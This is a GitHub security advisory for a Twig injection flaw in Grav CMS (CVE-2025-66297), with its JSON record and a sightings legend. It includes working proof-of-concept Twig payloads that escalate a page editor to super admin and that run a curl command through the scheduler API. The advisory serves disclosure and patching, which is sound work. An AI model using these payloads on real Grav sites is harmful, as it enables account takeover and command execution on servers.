GHSA-858Q-77WX-HHX6
Vulnerability from github – Published: 2025-12-02 01:24 – Updated: 2025-12-02 01:24
VLAI?
Summary
Grav vulnerable to Privilege Escalation and Authenticated Remote Code Execution via Twig Injection
Details
Summary
A user with admin panel access and permissions to create or edit pages in Grav CMS can enable Twig processing in the page frontmatter. By injecting malicious Twig expressions, the user can escalate their privileges to admin or execute arbitrary system commands via the scheduler API. This results in both Privilege Escalation (PE) and Remote Code Execution (RCE) vulnerabilities.
Details
Grav CMS allows Twig to be executed in page templates if enabled in admin panel (process: twig: true). A user with publisher/editor privileges, that can create or edit pages and enable twig processing, can thereby inject arbitrary code that will execute in the context of the page render.
This enables exploitation of Grav internal APIs such as:
- grav.user.update() and grav.user.save() for escalating the current user to super admin or admin
- grav.scheduler.addCommand(), grav.scheduler.save() and grav.scheduler.run() for code execution
The Twig sandbox is not enforced in this context, allowing full access to any backend PHP object and method in the system/src/Grav/Common directory.
PoC
Preconditions:
- You must have access to a non-admin user with permission to create/edit pages (
admin.pagesaccess) - For Privilege Escalation, you also have to be logged in to the site with the same user as the admin panel.
Steps to reproduce Privilege Escalation:
- Login into the non-admin page (default at
cms-url/login). - Login to the admin panel, create or edit a page and set the Twig processing to true (Advanced -> Process: Twig: true).
- Inject the following payload into the page content to escalate privileges:
{% set _ = grav.user.update({
'access': {
'admin': {
'login': true,
'super': true
}
}
}, {}) %}
{% set _ = grav.user.save() %}
- Visit the edited/created page url. The logged in user is now admin. (Note: For the changes to show, you need to log out of the admin panel and relogin).
Steps to reproduce Remote Code Execution:
- Login to the admin panel, create or edit a page and set the Twig processing to true (Advanced -> Process: Twig: true).
- Inject the following payload into the page content to execute commands:
{% set _ = grav.scheduler.addCommand('curl', ['http://localhost:8000']) %}
{% set _ = grav.scheduler.save() %}
{% set _ = grav.scheduler.run() %}
- Visit the page to trigger the execution. The system will issue a
curlrequest.
Impact
This vulnerability allows: - Privilege Escalation from any user with page editing capabilities to full admin (super) access. - Remote Code Execution, as the attacker can run system arbitrary commands via the scheduler API.
It affects any Grav CMS installation where users with lower privileges are allowed to create or edit pages and Twig processing is not globally disabled.
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "getgrav/grav"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.8.0-beta.27"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-66297"
],
"database_specific": {
"cwe_ids": [
"CWE-1336"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-02T01:24:19Z",
"nvd_published_at": "2025-12-01T21:15:53Z",
"severity": "HIGH"
},
"details": "### Summary\nA user with admin panel access and permissions to create or edit pages in Grav CMS can enable Twig processing in the page frontmatter. By injecting malicious Twig expressions, the user can escalate their privileges to admin or execute arbitrary system commands via the scheduler API. This results in both Privilege Escalation (PE) and Remote Code Execution (RCE) vulnerabilities.\n\n### Details\nGrav CMS allows Twig to be executed in page templates if enabled in admin panel (process: twig: true).\nA user with publisher/editor privileges, that can create or edit pages and enable twig processing, can thereby inject arbitrary code that will execute in the context of the page render.\n\nThis enables exploitation of Grav internal APIs such as:\n- `grav.user.update()` and `grav.user.save()` for escalating the current user to super admin or admin\n- `grav.scheduler.addCommand()`, `grav.scheduler.save()` and `grav.scheduler.run()` for code execution\n\nThe Twig sandbox is not enforced in this context, allowing full access to any backend PHP object and method in the `system/src/Grav/Common` directory.\n\n### PoC\n#### Preconditions:\n- You must have access to a **non-admin** user with permission to create/edit pages (```admin.pages``` access)\n- For Privilege Escalation, you also have to be logged in to the site with the same user as the admin panel.\n\n#### Steps to reproduce Privilege Escalation:\n1. Login into the non-admin page (default at `cms-url/login`).\n2. Login to the admin panel, create or edit a page and set the Twig processing to true (Advanced -\u003e Process: Twig: true).\n3. Inject the following payload into the page content to escalate privileges:\n```\n{% set _ = grav.user.update({\n \u0027access\u0027: {\n \u0027admin\u0027: {\n \u0027login\u0027: true,\n \u0027super\u0027: true\n }\n }\n}, {}) %}\n{% set _ = grav.user.save() %}\n```\n4. Visit the edited/created page url. The logged in user is now admin. (*Note: For the changes to show, you need to log out of the admin panel and relogin).*\n\n#### Steps to reproduce Remote Code Execution:\n1. Login to the admin panel, create or edit a page and set the Twig processing to true (Advanced -\u003e Process: Twig: true).\n2. Inject the following payload into the page content to execute commands:\n```\n{% set _ = grav.scheduler.addCommand(\u0027curl\u0027, [\u0027http://localhost:8000\u0027]) %}\n{% set _ = grav.scheduler.save() %}\n{% set _ = grav.scheduler.run() %}\n```\n3. Visit the page to trigger the execution. The system will issue a `curl` request.\n\n### Impact\nThis vulnerability allows:\n- Privilege Escalation from any user with page editing capabilities to full admin (super) access.\n- Remote Code Execution, as the attacker can run system arbitrary commands via the scheduler API.\n\nIt affects any Grav CMS installation where users with lower privileges are allowed to create or edit pages and Twig processing is not globally disabled.",
"id": "GHSA-858q-77wx-hhx6",
"modified": "2025-12-02T01:24:19Z",
"published": "2025-12-02T01:24:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-858q-77wx-hhx6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66297"
},
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"
},
{
"type": "PACKAGE",
"url": "https://github.com/getgrav/grav"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Grav vulnerable to Privilege Escalation and Authenticated Remote Code Execution via Twig Injection"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…